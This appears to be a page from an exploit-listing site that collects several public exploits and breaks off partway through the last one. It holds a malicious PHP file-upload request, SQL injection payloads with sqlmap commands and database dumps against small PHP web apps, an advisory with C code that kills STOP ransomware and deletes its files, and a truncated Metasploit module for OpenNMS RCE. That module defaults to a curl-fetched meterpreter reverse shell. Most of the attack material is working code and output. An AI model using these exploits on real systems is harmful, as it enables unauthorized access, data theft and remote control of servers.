Latest exploits :: CodePwn

<pre><code>## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability ## Author: nu11secur1ty ## Date: 03/26/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html ## Reference: https://portswigger.net/web-security/file-upload, https://www.bugcrowd.com/glossary/remote-code-execution-rce/ ## Description: The parameters back_login_image, login_image, invoice_image, and website_image in the manage_website.php application are vulnerable for File Upload and the server is vulnerable for Remote code execution after this. The attacker who has credentials to this system can upload any PHP file and he can destroy the system or he can steal a very sensitive information. STATUS: HIGH-CRITICAL Vulnerability ## Exploit: ```POST POST /garage/garage/manage_website.php HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n Content-Length: 1871 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://pwnedhost.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://pwnedhost.com/garage/garage/manage_website.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i Connection: close ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="title" Orange Station ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="footer" Admin PanelÃ‚Â ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="short_title" 9090909090 ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="currency_code" Shivaji Nagar, Nashik ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="currency_symbol" Ã¢â€šÂ¹ ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="old_website_image" logo.jpg ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="website_image"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="old_invoice_image" logo.jpg ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="invoice_image"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="old_login_image" logo.jpg ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="login_image"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="old_back_login_image" service.jpg ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="back_login_image"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryytBZTydZ8OfOJjda Content-Disposition: form-data; name="btn_web" ------WebKitFormBoundaryytBZTydZ8OfOJjda-- ``` ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html) ## Time spent: 00:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>+ Exploit Title: MobileShop master v1.0 - SQL Injection Vuln. + Date: 2024-13-03 + Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com) + Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/ + Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip + Tested on: Windows 10 Pro + CWE: CWE-89 + CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + Type: WebApps + Platform: PHP ## References: + https://cwe.mitre.org/data/definitions/89.html + https://owasp.org/Top10/A03_2021-Injection/ ## Description: The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data. ## Proof of Concept: + Go to the Login page: "http://localhost/MobileShop-master/Login.html" + Fill email and password. + Select any product and intercept the request via Burp Suite, then send it to Repeater. + Change the 'id' value to any of the below payloads. + Send the request ## Payloads: + id=1' AND 9071=9071 AND 'EtdU'='EtdU + id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk + id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - + Or you can write your own payloads ## Proof of Concept Using SqlMap: + Go to the Login page: "http://localhormst/MobileShop-master/Login.html" + Fill email and password. + Select any product and intercept the request via Burp Suite, then send it to Repeater. + Copy to File the request to a "sql.txt" file. + Run the following sqlmap command + sqlmap -r sql.txt -p id --dbs ``` POST /MobileShop-master/Details.php HTTP/1.1 Host: localhost Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://localhost/MobileShop-master/MobilesList.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn Connection: close id=1 ``` + Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database. ``` sqlmap -r sql.txt -p id --dbs ``` ``` --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [04:17:04] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.12, Apache 2.4.58 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [04:17:04] [INFO] fetching database names [04:17:05] [INFO] resumed: 'information_schema' [04:17:05] [INFO] resumed: '1' [04:17:05] [INFO] resumed: '3' [04:17:05] [INFO] resumed: 'admidio' [04:17:05] [INFO] resumed: 'calender' [04:17:05] [INFO] resumed: 'corregidor' [04:17:05] [INFO] resumed: 'gym' [04:17:05] [INFO] resumed: 'joomla_db' [04:17:05] [INFO] resumed: 'linkstack' [04:17:05] [INFO] resumed: 'mobileshop' [04:17:05] [INFO] resumed: 'mysql' [04:17:05] [INFO] resumed: 'nickey' [04:17:05] [INFO] resumed: 'performance_schema' [04:17:05] [INFO] resumed: 'phpmyadmin' [04:17:05] [INFO] resumed: 'rcms' [04:17:05] [INFO] resumed: 'smith' [04:17:05] [INFO] resumed: 'telephone' [04:17:05] [INFO] resumed: 'test' [04:17:05] [INFO] resumed: 'valente' ``` </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/3b9e9e130d52fe95c8be82aa4b8feb74.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Win32.STOP.Ransomware (smokeloader) Vulnerability: Remote Code Execution (MITM) Family: Stop Type: PE32 MD5 3b9e9e130d52fe95c8be82aa4b8feb74 Vuln ID: MVID-2024-0676 Disclosure: 03/22/2024 Description: There are two roads to exploitation for this particular ransomware, network "man-in-the-middle" or localized code execution, this advisory explores the network route. Stop ransomware makes several HTTP GET requests over an insecure protocol TCP port 80 to download secondary PE files "build2.exe" and "build3.exe" Moreover, no integrity checks are made on these files, well positioned third-party attackers who can intercept traffic can send back arbitrary exploit PE files. [Domains contacted] api.2ip.ua sajdfue.com sdfjhuz.com [URLs] /test2/get.php?pid=A41BF90C9233CFB5AAFE279642C3793D&first=true /dl/build2.exe /files/1/build3.exe Stop ransomware actions. 1) Creates two directories under AppData\Local, named with unique ID e.g. "2197cd80-6ccb-4fe1-97c0-57d05945fac6" 2) Sets deny permissions on the directory for everyone Everyone (OI)(CI)(DENY)(D,DC) 3) Creates Windows registry Run key "SysHelper" for persistence, that points to a directory in AppData\Local e.g. \Users\Victim\AppData\Local\407868e1-6d5a-44f2-81ba-a8fedd9ea8db\StopCrypt.exe 4) Copies downloaded malware to a second created directory under AppData\Local Exploit PE file executes as a child of the parent process malware and does following on our behalf. 1) Kill the parent process leveraging WIN32 API GetCurrentProcessId() Get parent process ID using CreateToolhelp32Snapshot() Call OpenProcess(PROCESS_TERMINATE, FALSE, ppid) 2) Delete registry persistence Run key "SysHelper" 3) Modify permissions on Stops backup directory to full access for everyone user group "/grant Everyone (OI)(CI)F" 4) Deletes the malware backup directory under AppData\Local [PoC/Video URL] https://www.youtube.com/watch?v=S6E62YIOczo [Sample] https://bazaar.abuse.ch/sample/caeecccfee0962fbe3d4fb4ab336bf3d1230b12ad0821ff66f7a2cabc289c954/ By the way, "urlmon.dll" DLL file exported by "RansomLord v2" can be used against this sample for local exploitation. Download: https://github.com/malvuln/RansomLord All tests conducted successfully in a virtual machine environment using DNS and traffic redirection techniques. Network Exploit/PoC 1) Compile the below "StopExploit.c" code as "build2.exe" and "build3.exe" 2) Create directory "dl" and save build2.exe here 3) Create directories "files/1" and save build3.exe here Note, In my tests exploitation worked with just the "build2.exe" saved in the "dl" directory. 4) Start web server on TCP port 80 python -m http.server 80 5) Intercept the Stop Ransomware traffic and DNS to server we control, send back exploit files. "StopExploit.c" #include "windows.h" #include "stdio.h" #include "tlhelp32.h" #include "psapi.h" #define BUFFER 512 //[+] Win32 STOP (smokeloader) Ransomware //[+] MD5 3b9e9e130d52fe95c8be82aa4b8feb74 //[+] Remote Code Execution PoC //[+] By John Page (aka hyp3rlinx) - malvuln //[+] ApparitionSec //[+] March 19, 2024 //========================================================================= //Abuses MITM insecure download over TCP port 80 to serve exploits to kill "Win32.Stop" malware //Deletes persistence Run key "SysHelper" and secondary malware backup directory //Tested successfully in Virtual Machine environment using DNS and network traffic redirection. //========================================================================= // //linker -lpsapi (Dev-C++) x32 // //========================================================================= /** DISCLAIMER Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ //========================================================================= DWORD getParentPID(DWORD pid); void Kill_StopCrypt(); void DelSysHelper(); void EvictBackupMalware(char *maldir); int main(void){ Sleep(3000); DelSysHelper(); return 666; } void Kill_StopCrypt(){ DWORD pid, ppid; pid = GetCurrentProcessId(); ppid = getParentPID(pid); HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, ppid); if (NULL != handle){ DelSysHelper(); TerminateProcess(handle, 0); CloseHandle(handle); } } void DelSysHelper(){ char value[BUFFER]; DWORD BufferSize = sizeof value; LONG rc = RegGetValueA(HKEY_CURRENT_USER, (LPCSTR)"Software\\Microsoft\\Windows\\CurrentVersion\\Run", (LPCSTR)"SysHelper", RRF_RT_ANY, NULL, (PVOID)&value, &BufferSize); if(rc == ERROR_SUCCESS){ rc = RegDeleteKey(HKEY_CURRENT_USER, (LPTSTR)"Software\\Microsoft\\Windows\\CurrentVersion\\Run"); if(rc == ERROR_SUCCESS){ Kill_StopCrypt(); } EvictBackupMalware(value); } } DWORD getParentPID(DWORD pid){ HANDLE h = NULL; PROCESSENTRY32 pe={0}; DWORD ppid = 0; pe.dwSize = sizeof(PROCESSENTRY32); h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(Process32First(h, &pe)){ do { if (pe.th32ProcessID==pid){ ppid = pe.th32ParentProcessID; break; } } while(Process32Next(h, &pe)); } CloseHandle(h); return (ppid); } char* concat(const char *s1, const char *s2){ char *result = malloc(strlen(s1) + strlen(s2) + 1); strcpy(result, s1); strcat(result, s2); return result; } void EvictBackupMalware(char *maldir){ char *infected_dir_path; int j = 0; int cnt = 0; int i; char array[255][255]; for (i=0; i <= (strlen(maldir)); i++){ if (maldir[i] == '\\' || maldir[i]=='\0'){ array[cnt][j]='\0'; cnt++; j=0; }else{ array[cnt][j]=maldir[i]; j++; } } char result[256]="C:\\Users\\"; char *r1; char *r2; for (i = 0; i < cnt; i++) { //printf(" %s %d\n", array[i],i); r1 = concat(result, array[2]); r2 = concat(r1, "\\AppData\\Local\\"); //reg run key path points to this infected directory infected_dir_path = concat(r2, array[5]); } //printf("target: %s", infected_dir_path); char perm[256]="icacls "; char *r3; char *perm_cmd; r3 = concat(perm, infected_dir_path); //reset permissions on dir created by Stop ransomware perm_cmd = concat(r3, " /grant Everyone:(OI)(CI)F"); system(perm_cmd); //evict backed up malware and dir char del_cmd[256]="RD "; char *force_del = concat(del_cmd, infected_dir_path); char *bye_bye_douche = concat(force_del, " /S /Q"); system(bye_bye_douche); } //malvuln circa 2024 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: SourceCodester PHP Task Management System 1.0 (update-employee.php) - SQL Injection # Date: 22 March 2024 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip # Version: v1.0 # CVE: CVE-2024-29302 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- Source Code(taskmatic/update-employee.php): $admin_id = $_GET['admin_id']; if(isset($_POST['update_current_employee'])){ $obj_admin->update_user_data($_POST,$admin_id); } if(isset($_POST['btn_user_password'])){ $obj_admin->update_user_password($_POST,$admin_id); } $sql = "SELECT * FROM tbl_admin WHERE user_id='$admin_id' "; $info = $obj_admin->manage_all_info($sql); $row = $info->fetch(PDO::FETCH_ASSOC); -> sqlmap -u "http://localhost/taskmatic/taskmatic/update-employee.php?admin_id=1" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs --- Parameter: admin_id (GET) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: admin_id=1';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: admin_id=1' AND (SELECT 3843 FROM (SELECT(SLEEP(5)))GLKx)-- mLKZ --- # Exploit Title: SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection # Date: 22 March 2024 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip # Version: v1.0 # CVE: CVE-2024-29303 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- Source Code(taskmatic/admin-manage-user.php): if(isset($_GET['delete_user'])){ $action_id = $_GET['admin_id']; $task_sql = "DELETE FROM task_info WHERE t_user_id = $action_id"; $delete_task = $obj_admin->db->prepare($task_sql); $delete_task->execute(); $attendance_sql = "DELETE FROM attendance_info WHERE atn_user_id = $action_id"; $delete_attendance = $obj_admin->db->prepare($attendance_sql); $delete_attendance->execute(); $sql = "DELETE FROM tbl_admin WHERE user_id = :id"; $sent_po = "admin-manage-user.php"; $obj_admin->delete_data_by_this_method($sql,$action_id,$sent_po); } -> sqlmap -u "http://localhost/taskmatic/taskmatic/admin-manage-user.php?delete_user=delete_user&admin_id=28" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs --- Parameter: admin_id (GET) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: delete_user=delete_user&admin_id=28;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: delete_user=delete_user&admin_id=28 AND (SELECT 9863 FROM (SELECT(SLEEP(5)))wYJM) --- # Exploit Title: SourceCodester PHP Task Management System 1.0 (update-admin.php) - SQL Injection # Date: 22 March 2024 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip # Version: v1.0 # CVE: CVE-2024-29301 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- Source Code(taskmatic/update-admin.php): $admin_id = $_GET['admin_id']; if(isset($_POST['update_current_employee'])){ $obj_admin->update_admin_data($_POST,$admin_id); } if(isset($_POST['btn_user_password'])){ $obj_admin->update_user_password($_POST,$admin_id); } $sql = "SELECT * FROM tbl_admin WHERE user_id='$admin_id' "; $info = $obj_admin->manage_all_info($sql); $row = $info->fetch(PDO::FETCH_ASSOC); -> sqlmap -u "http://localhost/taskmatic/taskmatic/update-admin.php?admin_id=1" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch -dbs --- Parameter: admin_id (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: admin_id=1' AND (SELECT 6339 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(6339=6339,1))),0x7176707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Ivgj Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: admin_id=1';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: admin_id=1' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))mEAi)-- QnHT --- </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'OpenNMS Horizon Authenticated RCE', 'Description' => %q{ This module exploits built-in functionality in OpenNMS Horizon in order to execute arbitrary commands as the opennms user. For versions 32.0.2 and higher, this module requires valid credentials for a user with ROLE_FILESYSTEM_EDITOR privileges and either ROLE_ADMIN or ROLE_REST. For versions 32.0.1 and lower, credentials are required for a user with ROLE_FILESYSTEM_EDITOR, ROLE_REST, and/or ROLE_ADMIN privileges. In that case, the module will automatically escalate privileges via CVE-2023-40315 or CVE-2023-0872 if necessary. This module has been successfully tested against OpenNMS version 31.0.7 }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik Wynter' # @wyntererik - Discovery and Metasploit ], 'References' => [ ['CVE', '2023-40315'], # CVE for privilege escalation via ROLE_FILESYSTEM_EDITOR in OpenNMS Horizon before 32.0.2 ['CVE', '2023-0872'], # CVE for privilege escalation via ROLE_REST in OpenNMS Horizon before 32.0.2 ], 'Platform' => 'linux', 'Arch' => 'ARCH_CMD', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp', 'RPORT' => 8980, 'SRVPORT' => 8080, 'FETCH_COMMAND' => 'CURL', 'FETCH_FILENAME' => Rex::Text.rand_text_alpha(2..4), 'FETCH_WRITABLE_DIR' => '/tmp', 'FETCH_SRVPORT' => 8081, 'WfsDelay' => 15 # It takes a while for the payload to execute }, 'Targets' => [ [ 'Linux', {} ] ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => '2023-07-01', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to OpenNMS', '/opennms/']), OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin']) ] register_advanced_options [ OptInt.new('PRIVESC_SAVE_DELAY', [true, 'The time in seconds to wait for privesc changes to go into effect.', 3]) ] end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def privesc_save_delay datastore['PRIVESC_SAVE_DELAY'] end def notification_commands_file 'notificationCommands.xml' end def destination_paths_file 'destinationPaths.xml' end def notifications_file 'notifications.xml' end def users_file 'users.xml' end def check # Try to authenticate success, msg_or_check_code = opennms_login('check') return msg_or_check_code unless success vprint_status(msg_or_check_code) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.jsp'), 'keep_cookies' => true }) unless res return CheckCode::Unknown('Connection failed.') end # If we are authenticating as a user without dashboard privileges, the response code will be 403, so we can't use this # Instead, we should simply check if the HTLM body includes the expected title and version information unless res.get_html_document.xpath('//title').text.include?('OpenNMS Web Console') return CheckCode::Detected('Failed to access the OpenNMS Web Console after authentication.') end # Based on the version history (https://www.opennms.com/version-history/) all OpenNMS Horizon versions follow the \d+\.\d+\.\d+ pattern version = res.body.scan(/- Version: (\d+\.\d+\.\d+)$/)&.flatten&.first if version.blank? return CheckCode::Detected('Failed to obtain a valid OpenNMS version.') end begin rex_version = Rex::Version.new(version) rescue ArgumentError => e return CheckCode::Unknown("Failed to obtain a valid OpenNMS version: #{e}") end if rex_version < Rex::Version.new('32.0.2') print_status("The target is OpenNMS version #{version} and is likely vulnerable to CVE-2023-40315 and CVE-2023-0872.") else print_status("The target is OpenNMS version #{version}.") end # Check if we can access the user configuration file. There are two ways to do this: # - Via the /rest/users endpoint. This is possible only for users with ROLE_ADMIN and ROLE_REST privileges. # - Via /rest/filesystem/contents?f=users.xml. This is possible only for users with ROLE_FILESYSTEM_EDITOR privileges. # If neither of these work for us, RCE won't be possible. success, xml_doc_or_check_code = grab_and_parse_xml_config_file(users_file, 'users', 'user', 'check', filesystem: false) # try the REST endpoint first unless success success, xml_doc_or_check_code = grab_and_parse_xml_config_file(users_file, 'users', 'user', 'check') # try the filesystem endpoint next return xml_doc_or_check_code unless success # in this case xml_doc_or_check_code is a CheckCode so we can return it directly end # Extract the privileges of the current user success, privs_or_check_code = grab_user_privs(xml_doc_or_check_code, 'check') return privs_or_check_code unless success # Successful exploitation requires the user to have FILESYSTEM_EDITOR privileges as well as either REST or ADMIN privileges if privs_or_check_code.include?('ROLE_FILESYSTEM_EDITOR') if privs_or_check_code.include?('ROLE_REST') || privs_or_check_code.include?('ROLE_ADMIN') # We don't need to escalate privileges here @highest_priv = 'GOD' return CheckCode::Appears("User #{username} has the required privileges for exploitation to work without privilege escalation.") end @highest_priv = 'ROLE_FILESYSTEM_EDITOR' elsif privs_or_check_code.include?('ROLE_ADMIN') @highest_priv = 'ROLE_ADMIN' return CheckCode::Appears("User #{username} has #{@highest_priv} privileges. Exploitation is likely possible via privilege escalation to ROLE_FILESYSTEM_EDITOR.") elsif privs_or_check_code.include?('ROLE_REST') @highest_priv = 'ROLE_REST' else return CheckCode::Safe("User #{username} does not have the required privileges for exploitation to work.") end # If we are here, we have ROLE_FILESYSTEM_EDITOR privileges or ROLE_REST privileges, but not both and not ROLE_ADMIN # This means that privilege escalation is required, which can work only if the OpenNMS version is 32.0.1 or lower if rex_version >= Rex::Version.new('32.0.2') return CheckCode::Detected("Exploitation requires privilege escalation, which is not possible for OpenNMS version #{version}.") end cve = if @highest_priv == 'ROLE_FILESYSTEM_EDITOR' 'CVE-2023-40315' else 'CVE-2023-0872' end CheckCode::Appears("User #{username} has #{@highest_priv} privileges. Exploitation is likely possible via #{cve}.") end # This method is use to handle failures based on the stage of the exploit # # @param mode [String] The mode to use: check, exploit or cleanup # @param message [String] The message to display to the user # @param status [String] The status to use: disconnected, unexpected_reply or no_access # @return [Array] An array containing a boolean and a CheckCode or message def deal_with_failure_by_mode(mode, message, status) return [false, "#{message}. Manual cleanup is required."] if mode == 'cleanup' case status when 'disconnected' return [false, CheckCode::Unknown(message)] if mode == 'check' fail_with(Failure::Disconnected, message) when 'unexpected_reply' return [false, CheckCode::Unknown(message)] if mode == 'check' fail_with(Failure::UnexpectedReply, message) when 'no_access' return [false, CheckCode::Safe(message)] if mode == 'check' fail_with(Failure::NoAccess, message) end end # This method is used to perform a login attempt # # @param mode [String] The mode to use: check, exploit or cleanup # @param perform_invalid_login [Boolean] Whether to perform a login attempt with random credentials or not # @return [Array] An array containing a boolean and a CheckCode or message def opennms_login(mode, perform_invalid_login: false) if perform_invalid_login user = Rex::Text.rand_text_alpha(8..12) pass = Rex::Text.rand_text_alpha(8..12) keep_cookies = false else user = username pass = password keep_cookies = true res1 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login.jsp'), 'keep_cookies' => keep_cookies }) unless res1 return deal_with_failure_by_mode(mode, 'Connection failed.', 'disconnected') end unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenNMS Web Console') msg = if mode == 'check' 'Target is not an OpenNMS application.' else 'Received unexpected response while attempting to access the OpenNMS Web Console.' end return deal_with_failure_by_mode(mode, msg, 'unexpected_reply') end end # Try to authenticate res2 = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'j_spring_security_check'), 'keep_cookies' => keep_cookies, 'vars_post' => { 'j_username' => user, 'j_password' => pass } }) unless res2 if perform_invalid_login return [false, "Connection failed while attempting to trigger the notification. The payload likely wasn't executed."] else return deal_with_failure_by_mode(mode, 'Connection failed while attempting to authenticate.', 'disconnected') end end unless res2.redirect? && res2.redirection.to_s.end_with?('/index.jsp') if perform_invalid_login return [true, 'Received expected response while triggering the payload. Please be patient, it may take a few seconds for the payload to execute.'] else message = if mode == 'check' 'Authentication failed. Please check your credentials.' else 'Received unexpected response while attempting to authenticate.' end return deal_with_failure_by_mode(mode, message, 'unexpected_reply') end end # Authentication was successful if perform_invalid_login return [false, "Received unexpected response while attempting to trigger the notification. The payload likely wasn't executed."] end [true, 'Successfully authenticated'] end # This method is used to obtain and parse an XML configuration file from the target via the filesystem endpoint # # @param file_name [String] The name of the file to obtain # @param root_element [String] The name of the root element in the XML file # @param element [String] The name of the element to obtain from the XML file # @param mode [String] The mode to use: check, exploit or cleanup. This is used to determine how to proceed upon failure # @param filesystem [Boolean] Whether to use the filesystem endpoint or not. If not, the file_name will be used as the REST endpoint # @return [Array] An array containing a boolean and either a CheckCode, a message or a Nokogiri::XML::Document def grab_and_parse_xml_config_file(file_name, root_element, element, mode, filesystem: true) request_hash = { 'method' => 'GET', 'keep_cookies' => true } if filesystem request_hash['uri'] = normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents') request_hash['vars_get'] = { 'f' => file_name } else request_hash['uri'] = normalize_uri(target_uri.path, 'rest', file_name) end # Try to obtain the file res = send_request_cgi(request_hash) unless res return deal_with_failure_by_mode(mode, "Connection failed while attempting to obtain the current #{file_name} file.", 